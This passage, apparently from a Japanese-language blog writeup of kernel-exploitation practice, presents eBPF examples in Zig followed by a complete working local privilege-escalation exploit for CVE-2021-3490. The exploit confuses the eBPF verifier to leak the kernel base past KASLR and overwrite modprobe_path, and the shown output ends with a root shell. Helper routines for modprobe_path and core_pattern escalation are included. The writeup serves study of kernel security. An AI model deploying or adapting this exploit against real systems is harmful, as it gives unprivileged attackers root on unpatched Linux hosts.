           _ = try posix.write(socks[1], "dontcare");
           try BPF.map_lookup_elem(mapfd, &.{1}, std.mem.asBytes(&buf));
           std.log.info("BPF_map[1] = 0x{x}", .{buf[0]});
       }
       
       // requires root/BPF privileges for BPF_PROG_TYPE_SK_SKB and looping
       fn example3() !void {
           std.debug.print("---(BPF Example 3)---\n", .{});
       
           const mapfd = try bpf_string_map("evil");
       
           const insns = [_]BPF.Insn{
               .mov(.r6, .r1),
               .stx(.double_word, .r10, -0x8, .r1),
               .st(.double_word, .r10, -0x10, 0),
       
               // return if packet_len < 4 bytes
               .ldx(.double_word, .r1, .r10, -0x8),
               .ldx(.word, .r7, .r1, 0),
               .jmp(.jge, .r7, 4, 2),
               .mov(.r0, @intFromEnum(SK.PASS)),
               .exit(),
       
               // load "evil" into r9
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
               .mov(.r2, .r10),
               .add(.r2, -0x10),
               .call(.map_lookup_elem),
               .jmp(.jne, .r0, 0, 2),
               .mov(.r0, @intFromEnum(SK.DROP)),
               .exit(),
               .mov(.r9, .r0),
       
               // begin checking for "evil"
               .mov(.r8, 0),
               .mov(.r1, .r6),
               .mov(.r2, .r8),
               .mov(.r3, .r10),
               .add(.r3, -0x18),
               .mov(.r4, 4),
               .call(.skb_load_bytes),
               .jmp(.jlt, .r0, 0, 10),
       
               // drop packet if it contains "evil"
               .mov(.r1, .r10),
               .add(.r1, -0x18),
               .mov(.r2, 4),
               .mov(.r3, .r9),
               // .call(.strncmp),
               .{
                   .code = BPF.CALL | BPF.JMP,
                   .dst = 0,
                   .src = 0,
                   .off = 0,
                   .imm = 182,
               },
               .jmp(.jne, .r0, 0, 2),
               .mov(.r0, @intFromEnum(SK.DROP)),
               .exit(),
               .add(.r8, 1),
               .jmp(.jlt, .r8, 0x200, -17),
       
               // replace start of packet with 'evil'
               .mov(.r1, .r6),
               .mov(.r2, 0),
               .mov(.r3, .r9),
               .mov(.r4, 4),
               .mov(.r5, BPF_F_RECOMPUTE_CSUM),
               .call(.skb_store_bytes),
       
               .mov(.r0, @intFromEnum(SK.PASS)),
               .exit(),
           };
       
           // verifier is a little too chatty due to the number of iterations
           const progfd = try BPF.prog_load(.sk_skb, &insns, null, "GPL v3", 0, 0);
       
           const sockmapfd = try BPF.map_create(.sockmap, @sizeOf(i32), @sizeOf(i32), 1);
       
           _ = try blk: {
               const attr = BPF.Attr{
                   .prog_attach = .{
                       .target_fd = sockmapfd,
                       .attach_bpf_fd = progfd,
                       .attach_type = @intFromEnum(BPF.AttachType.sk_skb_stream_verdict),
                       .attach_flags = 0,
                       .replace_bpf_fd = 0,
                   },
               };
       
               break :blk switch (posix.errno(linux.bpf(.prog_attach, @constCast(&attr), @sizeOf(BPF.ProgAttachAttr)))) {
                   .SUCCESS => {},
                   .ACCES => error.UnsafeProgram,
                   .FAULT => unreachable,
                   .INVAL => error.InvalidProgram,
                   .PERM => error.PermissionDenied,
                   else => |err| posix.unexpectedErrno(err),
               };
           };
       
           var socks: [2]linux.fd_t = undefined;
           switch (posix.errno(linux.socketpair(AF.UNIX, SOCK.DGRAM | SOCK.NONBLOCK, 0, &socks))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
           try BPF.map_update_elem(sockmapfd, &std.mem.toBytes(@as(i32, 0)), std.mem.asBytes(&socks[0]), BPF.ANY);
       
           const packets = [_][]const u8{
               "a",
               "aaaa",
               "imevil",
               "eviliam",
               "goodiam",
               "Lorem ipsum dolor sit amet, consectetur adipiscing elit.",
           };
       
           var buf: [0x100]u8 = undefined;
           for (packets) |p| {
               _ = try posix.write(socks[1], p);
               const n_read = posix.read(socks[0], &buf) catch 0;
               std.log.info("Sent '{s}', received '{s}'", .{ p, buf[0..n_read] });
           }
       }
       
       
       pub fn main() !void {
           try example1();
           try example2();
           try example3();
       }
       ---(BPF Example 1)---
       [INFO] Sent 'Hello', received 'Hell'
       [INFO] BPF Verifier output:
       func#0 @0
       0: R1=ctx(off=0,imm=0) R10=fp0
       0: (b7) r0 = 4                        ; R0_w=4
       1: (95) exit
       processed 2 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0
       
       ---(BPF Example 2)---
       [INFO] BPF_map[1] = 0xbebafecabebafeca
       [INFO] BPF_map[1] = 0x1337
       [INFO] BPF Verifier output:
       func#0 @0
       0: R1=ctx(off=0,imm=0) R10=fp0
       0: (7a) *(u64 *)(r10 -8) = 1          ; R10=fp0 fp-8_w=mmmmmmmm
       1: (7a) *(u64 *)(r10 -16) = 4919      ; R10=fp0 fp-16_w=mmmmmmmm
       2: (18) r1 = 0xffff892b83b2b800       ; R1_w=map_ptr(off=0,ks=4,vs=8,imm=0)
       4: (bf) r2 = r10                      ; R2_w=fp0 R10=fp0
       5: (07) r2 += -8                      ; R2_w=fp-8
       6: (bf) r3 = r2                       ; R2_w=fp-8 R3_w=fp-8
       7: (07) r3 += -8                      ; R3_w=fp-16
       8: (b7) r4 = 0                        ; R4_w=0
       9: (85) call bpf_map_update_elem#2    ; R0_w=scalar()
       10: (b7) r0 = 0                       ; R0_w=0
       11: (95) exit
       processed 11 insns (limit 1000000) max_states_per_insn 0 total_states 0 peak_states 0 mark_read 0
       
       ---(BPF Example 3)---
       [INFO] Sent 'a', received 'a'
       [INFO] Sent 'aaaa', received 'evil'
       [INFO] Sent 'imevil', received ''
       [INFO] Sent 'eviliam', received ''
       [INFO] Sent 'goodiam', received 'eviliam'
       [INFO] Sent 'Lorem ipsum dolor sit amet, consectetur adipiscing elit.', received 'evilm ipsum dolor sit amet, consectetur adipiscing elit.'
       
       eBPFはかなり強力だが、不権利ユーザーで使える関数は少ない(当然だ)。
       でもいくつかの関数は使えるはずだが、どういうわけか使えできなっかた(例えば​`bpf_get_current_ta
       sk`​)。
       
       === CVE-2021-3490
       
       
       このパーチは​`src`​と​`dst`​が知る場合は​`__mark_r
       eg32_known`​を呼び出しない。
       説明はちょっと複雑ので、chompieさん [8]やptr-yudaiさん [9]に譲ることとする。
       概略はとあるレジースタの値についてBPFの検証機は最小値が1,最大値値は1,ですが本当の値は2.
       
       「BPFマップやBPFスタック、コンテキストのアドレスをリークせずに」悪用したいんだから、多くの方法排除した。
       const BPF = linux.BPF;
       const AF = linux.AF;
       const SOCK = linux.SOCK;
       const SOL = linux.SOL;
       const SO = linux.SO;
       
       // broken in 0.14.1
       fn _ld_dw1(dst: BPF.Insn.Reg, imm: u64) BPF.Insn {
           return .{
               .code = BPF.LD | BPF.DW | BPF.IMM,
               .dst = @intFromEnum(dst),
               .src = @intFromEnum(BPF.Insn.Reg.r0),
               .off = 0,
               .imm = @as(i32, @bitCast(@as(u32, @truncate(imm)))),
           };
       }
       fn _ld_dw2(imm: u64) BPF.Insn {
           return .{
               .code = 0,
               .dst = 0,
               .src = 0,
               .off = 0,
               .imm = @as(i32, @bitCast(@as(u32, @truncate(imm >> 32)))),
           };
       }
       
       fn bpf_helper(mapfd: posix.fd_t, insns: []const BPF.Insn, input: []const u8) !void {
           try BPF.map_update_elem(mapfd, &std.mem.toBytes(@as(i32, 0)), &.{1}, BPF.ANY);
       
           var verifier_log: [0x20000]u8 = undefined;
           var log = BPF.Log{ .buf = &verifier_log, .level = 2 };
           errdefer std.log.err("BPF Verifier output:\n{s}", .{std.mem.sliceTo(&verifier_log, 0)});
       
           const progfd = try BPF.prog_load(.socket_filter, insns, &log, "GPL v3", 0, 0);
       
           var socks: [2]linux.fd_t = undefined;
           switch (posix.errno(linux.socketpair(AF.UNIX, SOCK.DGRAM, 0, &socks))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
           switch (posix.errno(linux.setsockopt(socks[0], SOL.SOCKET, SO.ATTACH_BPF, std.mem.asBytes(&progfd), 4))) {
               .SUCCESS => {},
               else => |e| return posix.unexpectedErrno(e),
           }
       
           _ = try posix.write(socks[1], input);
       }
       
       fn confirm_unpriviledged_bpf() !void {
           // demonstrate that we don't have CAP_BPF or CAP_SYS_ADMIN by confirming that we can't load a BPF program that requires elevated capabilities.
           const insns = [_]BPF.Insn{
               .{
                   .code = BPF.CALL | BPF.JMP,
                   .dst = 0,
                   .src = 1,
                   .off = 0,
                   .imm = 2,
               },
               .mov(.r0, 0),
               .exit(),
           } ++ [_]BPF.Insn{
               .mov(.r0, 0),
               .exit(),
           };
       
           if (BPF.prog_load(.socket_filter, &insns, null, "GPL v3", 0, 0)) |_| {
               std.log.warn("User is bpf_capable! (Are you running this as root?)", .{});
           } else |err| switch (err) {
               error.AccessDenied => std.log.info("User is not bpf_capable", .{}),
               else => return err,
           }
       }
       
       ==== 型混同プリミティブ
       
       
       型混同とは検証機にとあるレジスタは型アを納得する、でも本当は型イ。
       普通なら簡単に​`r10`​に前述悪用なレジスタを加算する、だが一般ユーザなのでALU
       sanitizationは有効、そしてポインタ加減算はそう簡単にならない。
       `skb_load_bytes`​を使えばオバーフローできるし、偶然天才的な発想を考えた:アド
       レスの最後バイトを0x00にするとアドレスに[0,255] に引き算するは同じじゃねかッと思った。
       この方法でeBPFの検証機を騙す、​`r1`​が​`r10-
       0x18`​である認識させるだが実際に​`r10-
       0x20`​であること:​`r1`​にロードをするば「型混同」はできる。
       
       そういうわけでどうやってKASLRを破る?
       eBPFのヘルパーを呼び出す命令はJIT後にx86の​`call`​命令になる:この命令と命令のアドレスをリークす
       ればそのヘルパーのアドレスを割り出せるそしてカネールのベスアドレス分かりできた。
       
       eBPFのヘルパー[^fn:9]を呼び出す時に復帰アドレスはスタックにプッシュする。
       偽​`sk_buff`​をスタックに作ると​`skb_load_bytes
       `​利用したら、スタックから復帰アドレスを読みできる(注記:スタックのアドレス一歳リークしてない、eBPF
       JITしたプログラムのアドレスをリークした)。
       <<pawnyable-lib>>
       <<lk06-bpf>>
       
       var MODPROBE_PATH: u64 = 0xffffffff81e37fe0;
       const BPF_USER_RND_U32: u64 = 0xffffffff810e4590;
       
       fn call_decoder(address: u64, insn: []const u8) u64 {
           const builtin = @import("builtin");
           std.debug.assert(builtin.target.cpu.arch == .x86_64);
           std.debug.assert(insn[0] == 0xe8 and insn.len == 5);
       
           return 0xffffffff00000000 | ((address + insn.len) +% std.mem.bytesToValue(u64, insn[1..5]));
       }
       
       fn exploit_prologue(mapfd: posix.fd_t) [26]BPF.Insn {
           return [_]BPF.Insn{
               .mov(.r6, .r1),
               .st(.double_word, .r10, -0x8, 0),
       
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
               .mov(.r2, .r10),
               .add(.r2, -0x8),
               .call(.map_lookup_elem),
               .jmp(.jne, .r0, 0, 2),
               .mov(.r0, 0),
               .exit(),
               .mov(.r9, .r0),
       
               .ldx(.double_word, .r1, .r9, 0),
               .rsh(.r1, 32),
               .lsh(.r1, 32),
       
               .alu(64, .mov, .r2, @as(i32, @bitCast(@as(u32, 0xfffffffe)))),
               .lsh(.r2, 32),
               .add(.r2, 1),
       
               .alu_or(.r1, .r2),
               // R1 \in [1, 0] = 1
       
               .ldx(.double_word, .r2, .r9, 0),
               .jmp(.jle, .r2, 1, 2),
               .mov(.r0, 0),
               .exit(),
               // R2 \in [0, 1] = 1
       
               .add(.r1, .r2),
               .alu(32, .mov, .r1, .r1),
               .sub(.r1, 1),
               .stx(.double_word, .r10, -0x10, .r1),
           };
       }
       
       fn exploit_stack_confusion() [155]BPF.Insn {
           // results are stored in r7 (a frame pointer that the verifier thinks points to fp-0x18 but doesn't) and r8 (a frame pointer that points to the same place as the corrupted frame pointer but it is consistent with the verifier)
           // in other words, use r8 to load a malicious value, load the innocent value into r10-0x18, and load from r7 to get type confusion
           var ret: [155]BPF.Insn = undefined;
           const _insns = comptime blk: {
               var insns: []const BPF.Insn = &.{};
               insns = insns ++ [_]BPF.Insn{
                   // load fp-0x18 on the stack
                   .mov(.r1, .r10),
                   .add(.r1, -0x20),
                   .stx(.double_word, .r10, -0x18, .r1),
       
                   .mov(.r1, .r6), // skb->data == "foobared\x00\x08"
                   .mov(.r2, 0),
                   // 8 bytes before the last byte of the to-be-corrupted stack pointer
                   .mov(.r3, .r10),
                   .add(.r3, -0x20),
                   // r4 (expected: 0x8, actual: 0x9)
                   .ldx(.double_word, .r4, .r10, -0x10),
                   .add(.r4, 0x8),
                   .call(.skb_load_bytes),
                   // r7 = (fp-0x20) - [0, 0xf8]
                   .ldx(.double_word, .r7, .r10, -0x18),
               };
       
               // zero out the stack
               for (1..0xf8/8+1) |_i| {
                   const i: i16 = @intCast(_i);
                   insns = insns ++ [_]BPF.Insn{
                       .st(.double_word, .r10, -0x18-8*i, 0),
                   };
               }
       
               insns = insns ++ [_]BPF.Insn{
                   // load a special value somewhere on the stack
                   .ldx(.double_word, .r1, .r9, 0),
                   .stx(.double_word, .r7, 0, .r1), // r1 == 1, but the verifier doesn't know that
       
                   // special case for if the pointer was left unchanged
                   .ldx(.double_word, .r1, .r10, -0x20),
                   .jmp(.jne, .r1, 1, 14),
                   // this will always result in r7 being (expected: fp-0x20, actual: fp-0x18)
                   .mov(.r1, .r10),
                   .add(.r1, -0x20),
                   .stx(.double_word, .r10, -0x18, .r1),
                   .mov(.r1, .r6),
                   .mov(.r2, 1), // now the last byte is 0x8, not 0x0
                   .mov(.r3, .r10),
                   .add(.r3, -0x20),
                   .ldx(.double_word, .r4, .r10, -0x10),
                   .add(.r4, 0x8),
                   .call(.skb_load_bytes),
                   .ldx(.double_word, .r7, .r10, -0x18),
                   .mov(.r8, .r10),
                   .add(.r8, -0x18),
                   .jmp(.ja, .r0, 0, (0xf8/8)*3+2), // "exit" by skipping the rest of the program
       
                   .mov(.r8, .r10),
                   .add(.r8, -0x18),
               };
       
               // search the stack for the special value
               for (1..0xf8/8+1) |_i| {
                   const i: i16 = @intCast(_i);
                   insns = insns ++ [_]BPF.Insn{
                       .add(.r8, -0x8),
                       .ldx(.double_word, .r1, .r8, 0),
                       .jmp(.jeq, .r1, 1, (0xf8/8-i)*3),
                   };
               }
       
               break :blk &insns;
           };
       
           @memcpy(&ret, _insns.*);
           return ret;
       }
       
       fn overwrite_modprobe_path() !void {
           const mapfd: i32 = try BPF.map_create(.array, @sizeOf(i32), @sizeOf(u64), 1);
       
           const insns = exploit_prologue(mapfd) ++ exploit_stack_confusion() ++ [_]BPF.Insn{
               // type confusion of r1 (expected: fp-0x8, actual: MODPROBE_PATH)
               _ld_dw1(.r1, MODPROBE_PATH),
               _ld_dw2(MODPROBE_PATH),
               .stx(.double_word, .r8, 0, .r1),
               .mov(.r1, .r10),
               .add(.r1, -0x8),
               .stx(.double_word, .r10, -0x20, .r1),
               .ldx(.double_word, .r1, .r7, 0),
       
               _ld_dw1(.r2, std.mem.bytesAsValue(u64, "/tmp/x\x00").*),
               _ld_dw2(std.mem.bytesAsValue(u64, "/tmp/x\x00").*),
               .stx(.double_word, .r1, 0, .r2),
       
               .mov(.r0, 0),
               .exit(),
           };
       
           try bpf_helper(mapfd, &insns, "foobar");
       }
       
       fn kaslr_leak() !u64 {
           const mapfd: i32 = try BPF.map_create(.array, @sizeOf(i32), @sizeOf(u64), 3);
       
           const insns = exploit_prologue(mapfd) ++ exploit_stack_confusion() ++ [_]BPF.Insn{
               // type confusion: r1 (expected: scalar, actual: fp)
               .stx(.double_word, .r8, 0, .r10),
               .st(.double_word, .r10, -0x20, 0xdead),
               .ldx(.double_word, .r1, .r7, 0),
       
               .add(.r1, -0x190), // fp-0x190, this is where the saved return address is stored
       
               // construct a fake skb on the stack
               .stx(.double_word, .r8, -0x8, .r1), // skb->data == fp-0x110
               .st(.double_word, .r8, -(0x8+(0xb8-0x68)), 0x100), // skb->data_len == 0xcafe
               .mov(.r1, .r8),
               .add(.r1, -(0x8+0xb8)), // &skb
               .stx(.double_word, .r8, 0, .r1),
       
               // type confusion: r1 (expected: ctx, actual: fp-)
               .stx(.double_word, .r10, -0x20, .r6),
               .ldx(.double_word, .r1, .r7, 0),
       
               .mov(.r2, 0),
               .mov(.r3, .r8),
               .add(.r3, -0x10),
               .mov(.r4, 8),
               .call(.skb_load_bytes),
       
               // the address of this instruction is now in r8-0x10
               .{
                   .code = BPF.CALL | BPF.JMP,
                   .dst = 0,
                   .src = 0,
                   .off = 0,
                   .imm = 7,
               },
       
               // map[1] = &call_instruction
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
               .st(.double_word, .r10, -0x8, 1),
               .mov(.r2, .r10),
               .add(.r2, -0x8),
               .mov(.r3, .r8),
               .add(.r3, -0x10),
               .mov(.r4, 0),
               .call(.map_update_elem),
       
               // type confusion: r1 (expected: fp-0x8, actual: &call_instruction)
               .ldx(.double_word, .r1, .r8, -0x10),
               .stx(.double_word, .r8, 0, .r1),
               .mov(.r1, .r10),
               .add(.r1, -0x8),
               .stx(.double_word, .r10, -0x20, .r1),
               .ldx(.double_word, .r1, .r7, 0),
       
               // map[2] = call_instruction
               .mov(.r3, .r1),
               .ld_map_fd1(.r1, mapfd),
               .ld_map_fd2(mapfd),
               .st(.double_word, .r10, -0x8, 2),
               .mov(.r2, .r10),
               .add(.r2, -0x8),
               .mov(.r4, 0),
               .call(.map_update_elem),
       
               .mov(.r0, 0),
               .exit(),
           };
       
           // idk why but adding \x00\x08 to the end doesn't work as expected
           try bpf_helper(mapfd, &insns, "foobared");
       
           var buf: [2]u64 = undefined;
           for (0..2) |i| try BPF.map_lookup_elem(mapfd, &std.mem.toBytes(@as(i32, @intCast(i+1))), std.mem.asBytes(&buf[i]));
       
           return call_decoder(buf[0], std.mem.asBytes(&buf[1])[0..5]) - BPF_USER_RND_U32;
       }
       
       pub fn main() !void {
           try confirm_unpriviledged_bpf();
       
           const kaslr_offset = try kaslr_leak();
           std.log.info("Kernel base: 0x{s}", .{std.fmt.bytesToHex(bigEndianify(8, std.mem.asBytes(&(kaslr_offset+0xffffffff81000000))), .lower)});
           MODPROBE_PATH += kaslr_offset;
       
           try overwrite_modprobe_path();
       
           modprobePath();
       }
       whoami: unknown uid 1337
       [INFO] User is not bpf_capable
       [INFO] Kernel base: 0xffffffff9b800000
       [INFO] You won!!
       root
       
 (DIR) 完全なexploit
       
       実は「BPFスタックを使わずに」もexploitしたかったが、できなかった。
       (PageJack                                            [10]とDirtyCred
       [11]なような術使ったが、でもcred_jarキャッシュが開放したページに配置できなっかた。ヒープ風水は難しいよね。)
       
       == Org-babel部分
       
       
       エクスプロイト開発にはOrg-
       babelを活用している(ジュピターノートブックみたいなやつ⸺興味があるなら関連項目は文芸的プログラッミング)。
       
       コードブロックを実行する時にはこうなる:
       
       1.  Zigソースは抽出するとコンパイルする
       2.  rootfsを再作成する
       3.  QEMUでシェルを実行する、そして入力文字列とコマンド出力の送受信
       
       それだけじゃない!
       このページは同じOrg内容でox-hugo [12]でエクスポートした結果だ。
       格好いいだろう(少なくとも僕はそう思う)。
       
       以下はこのページで使用される色んな関数だ。
       const std = @import("std");
       
       const linux = std.os.linux;
       const posix = std.posix;
       
       pub const std_options = std.Options{
           .log_level = if (@hasDecl(@This(), "DEBUG")) .debug else .info,
           .logFn = pawnyableLogger,
       };
       
       pub fn pawnyableLogger(
           comptime level: std.log.Level,
           comptime _: @Type(.enum_literal),
           comptime format: []const u8,
           args: anytype,
       ) void {
           const prefix = "[" ++ comptime blk: {
               const level_text = switch (level) {
                   .debug => "DBUG",
                   .info => "INFO",
                   .warn => "WARN",
                   .err => "ERRR",
               };
               var buf: [level_text.len]u8 = undefined;
               break :blk std.ascii.upperString(&buf, level_text);
           } ++ "] ";
       
           std.debug.lockStdErr();
           defer std.debug.unlockStdErr();
           const stderr = std.io.getStdErr().writer();
           nosuspend stderr.print(prefix ++ format ++ "\n", args) catch return;
       }
       
       
       fn bigEndianify(comptime len: usize, buf: []const u8) [len]u8 {
           var bufLE: [len]u8 = undefined;
           inline for (0..len) |i| bufLE[i] = buf[len-1-i];
           return bufLE;
       }
       
       var __spinlock: bool = false;
       inline fn spin() void {
           while (true) if (__spinlock) break;
       }
       
       export var user_cs: u64 = 0;
       export var user_ss: u64 = 0;
       export var user_rsp: u64 = 0;
       export var user_rflags: u64 = 0;
       
       fn saveState() callconv(.C) void {
           asm volatile (
             \\.intel_syntax noprefix
             \\mov user_cs, cs
             \\mov user_ss, ss
             \\mov user_rsp, rsp
             \\pushfq
             \\pop qword ptr user_rflags
             \\.att_syntax
           );
       }
       
       fn whoami() void {
           std.log.info("You won!!", .{});
       
           const args = [_:null]?[*:0]const u8{"/usr/bin/whoami"};
           const env = [_:null]?[*:0]u8{};
           switch (posix.execveZ("/usr/bin/whoami", args[0..args.len], env[0..env.len])) {
               else => unreachable,
           }
           unreachable;
       }
       
       fn modprobePath() void {
           std.log.info("You won!!", .{});
       
           const tmpx = std.fs.cwd().createFile(
               "/tmp/x", .{
                   .read = true,
                   .mode = 0o777,
               },
           ) catch unreachable;
           tmpx.writeAll(
               \\#!/bin/sh
               \\/usr/bin/whoami &> /tmp/whoisit
               \\chmod 777 /tmp/whoisit
           ) catch unreachable;
           tmpx.close();
       
           const unknown = std.fs.cwd().createFile(
               "/tmp/unknown", .{
                   .read = true,
                   .mode = 0o777,
               },
           ) catch unreachable;
           unknown.writeAll(&[_]u8{0xff}**4) catch unreachable;
           unknown.close();
       
           posix.exit(0);
       }
       
       fn corePattern() void {
           std.log.info("You won!!", .{});
       
           const tmpx = std.fs.cwd().createFile(
               "/tmp/x", .{
                   .read = true,
                   .mode = 0o777,
               },
           ) catch unreachable;
           tmpx.writeAll(
               \\#!/bin/sh
               \\/usr/bin/whoami &> /tmp/whoisit
               \\chmod 777 /tmp/whoisit
           ) catch unreachable;
           tmpx.close();
       
           switch (posix.fork() catch unreachable) {
               0 => posix.abort(),
               else => |pid| _ = posix.waitpid(pid, 0),
           }
       
           const flag = std.fs.openFileAbsolute("/tmp/whoisit", .{}) catch {
               std.log.err("Failed to open /tmp/whoisit", .{});
               posix.abort();
           };
           defer flag.close();
           std.debug.print("{s}", .{(tmpx.reader().readBoundedBytes(32) catch unreachable).constSlice()});
       
           posix.exit(0);
       }
       
       fn catchSigsegv(comptime handler: *const fn () void) void {
           const wrapper = struct { fn wrapper(_: i32) callconv(.C) void { handler(); } }.wrapper;
           const sigact = posix.Sigaction{
               .handler = .{ .handler = &wrapper },
               .mask = posix.empty_sigset,
               .flags = 0,
           };
           posix.sigaction(posix.SIG.SEGV, &sigact, null);
       }
       const pinThreadToCore = (struct {
           const pthread = @cImport({
               @cDefine("_GNU_SOURCE", {});
               @cInclude("pthread.h");
           });
       
           fn pinThreadToCore(thread: std.Thread.Handle, core: usize) !void {
               var cpu = std.bit_set.ArrayBitSet(usize, linux.CPU_SETSIZE*@sizeOf(usize)).initEmpty();
               cpu.set(core);
       
               const err = pthread.pthread_setaffinity_np(@ptrCast(thread), @sizeOf(posix.cpu_set_t), @ptrCast(&@as(posix.cpu_set_t, @bitCast(cpu.masks))));
               switch (@as(posix.E, @enumFromInt(err))) {
                   .SUCCESS => return,
                   .FAULT => unreachable,
                   .INVAL => return error.InvalidArgument,
                   .SRCH => return error.ProcessNotFound,
                   else => |e| return posix.unexpectedErrno(e),
               }
           }
       }).pinThreadToCore;
       mkdir -p rootfs; cd rootfs
       cpio -id < ../rootfs.cpio 2>/dev/null
       ls
       pushd rootfs
       find . -print0 | cpio --null --format=newc -o 2>/dev/null > ../rootfs.cpio
       cd ..
       set -e
       
       if [ ! "$libc" = true ]; then
           libc=""
       else
           libc="-lc"
       fi
       
       input=$(mktemp --suffix=.zig)
       echo "$code" > $input
       zig build-exe $libc -femit-bin=exploit -target x86_64-linux-musl $input
       rm exploit.o
       rm $input
       
       mv exploit ./rootfs/
       if [ "$root" = true ]; then
           suid=0
       else
           suid=1337
       fi
       if [ ! "$kaslr" = true ]; then
           export NOKASLR=1
       fi
       temp=$(mktemp)
       chmod 755 $temp
       
       cp rootfs/etc/init.d/S99pawnyable $temp
       sed -i -E "s/(setuidgid) [[:digit:]]+ (sh)/\1 $suid \2/" rootfs/etc/init.d/S99pawnyable
       <<regenerate-rootfs>>
       mv $temp rootfs/etc/init.d/S99pawnyable
       
       ./run.sh &
       sleep 2
       { echo -n; sleep 1; echo "$shellcmd; exit #^"; } | socat -t 2 -,ignoreeof UNIX:vm.sock
       
       もっといいプログラマーになりたいなら、 Recurse Center [13]に応募を考えしろ。
       
       [^fn:1]: 文章にはAIの助けを借りたんだがコードには使ってない。
       [^fn:2]: https://elixir.bootlin.com/linux/v5.10.7/source/include/li
       nux/tty.h#L285-L345 [14]
       [^fn:3]:   pwnの文脈に​`tty_struct`​を利用するの詳細につてはこちら
       [15]やこちら [16]。
       [^fn:4]: `read`​や​`write`​等
       は他のセキュリティー対策 [17]があるらしいので、とりあえず​`ioctl`​を利用する。
       [^fn:5]: SLUB Internals for Exploit Developers [18]
       [^fn:6]: Linux SLUB Allocator Internals and Debugging, Part 1 of  4
       [19]
       [^fn:7]:                             https://docs.kernel.org/admin-
       guide/mm/userfaultfd.html#creating-a-userfaultfd [20]
       [^fn:8]:     このページはCC     BY      4.0      [21]image      [22]image
       [23]に免許する、そして全てのeBPFバイトコードはGPLv3 [24]にも免許する。
       [^fn:9]: 元々サブプログラムを利用しようとした、でもあれにはbpf_capableの権限は必要だ。
       
       References:
 (HTM)   [1] PAWNYABLE
 (HTM)   [2] 出典
 (HTM)   [3] ptmx_fops
 (HTM)   [4] core_pattern
 (HTM)   [5] userfaultfdのハローワールド
 (DIR)   [6] こち
 (HTM)   [7] 勉強した
 (HTM)   [8] chompieさん
 (HTM)   [9] ptr-yudaiさん
 (HTM)   [10] PageJack
 (HTM)   [11] DirtyCred
 (HTM)   [12] ox-hugo
 (HTM)   [13] Recurse Center
 (HTM)   [14] https://elixir.bootlin.com/linux/v5.10.7/source/include/linux/tty.h#L285-L345
 (HTM)   [15] こちら
 (HTM)   [16] こちら
 (HTM)   [17] 他のセキュリティー対策
 (HTM)   [18] SLUB Internals for Exploit Developers
 (HTM)   [19] Linux SLUB Allocator Internals and Debugging, Part 1 of 4
 (HTM)   [20] https://docs.kernel.org/admin-guide/mm/userfaultfd.html#creating-a-userfaultfd
 (HTM)   [21] CC BY 4.0
 (HTM)   [22] image
 (HTM)   [23] image
 (HTM)   [24] GPLv3
       >=================================================================<
       
 (DIR) ブログ
 (DIR) Writeups
 (DIR) en
       
       copyright 2026 George Huebner
 (HTM) email